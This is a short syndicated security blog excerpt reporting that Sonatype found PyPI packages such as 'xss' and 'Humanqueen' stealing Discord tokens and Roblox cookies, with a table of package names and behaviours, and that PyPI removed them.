Home » Cybersecurity » Threats & Breaches » Vulnerabilities » Malicious Roblox Cookie and Discord Token Stealers Hit PyPI Repository
Malicious Roblox Cookie and Discord Token Stealers Hit PyPI Repository
Over the past few years, Sonatype had consistently been on top of discovering malicious packages infiltrating open source ecosystems like npm, PyPI, and GitHub. Among various examples, this has included Discord token and credit card stealers previously caught on the npm registry by our automated malware detection system, Nexus Firewall.
And, just last week, we reported that the PyPI repository had been flooded with more than 1200 dependency confusion packages that served no functional purpose.
This week, our early warning systems have once again caught malicious PyPI packages that steal your Roblox security cookies and Discord tokens. These packages shown below are accounted for in Sonatype’s security data under sonatype-2022-0706, and sonatype-2022-0723.
Package (Downloads) |
Author |
Purpose |
Description |
xss |
HeyDeveloper aka Drake |
Typosquatting |
Discord token stealers, not a PoC for an “XSS” attack as the package claims |
Easyfuncsys |
Possible typosquat of a legitimate package |
Steals Discord token and leveldb files, runs a suspicious EXE |
|
Humanqueen |
Xin1337 |
Unclear |
Steals Discord token and leveldb files |
Humanqueenn |
Xin1337 |
Unclear |
Steals Discord token and leveldb files |
According to PePy stats, these packages have been retrieved a total of 3,916 times—this includes downloads from PyPI users and automated mirrors.
On discovering these packages this week, we rushed our findings to the PyPI security team who have since removed the packages.
Roblox Security Cookie Stealer
As gaming platforms like Discord and Roblox have gained popularity and rapid adoption, threat actors continue to target users and devs of these platforms through techniques like typosquatting or brandjacking, as Sonatype has previously reported.
However, the packages caught by us this time are of a quirky nature.
Starting with the PyPI package ‘xss,’ for example, we see it touts itself to be a “simple XSS (Read more...)
*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/malicious-roblox-cookie-and-discord-token-stealers-hit-pypi-repository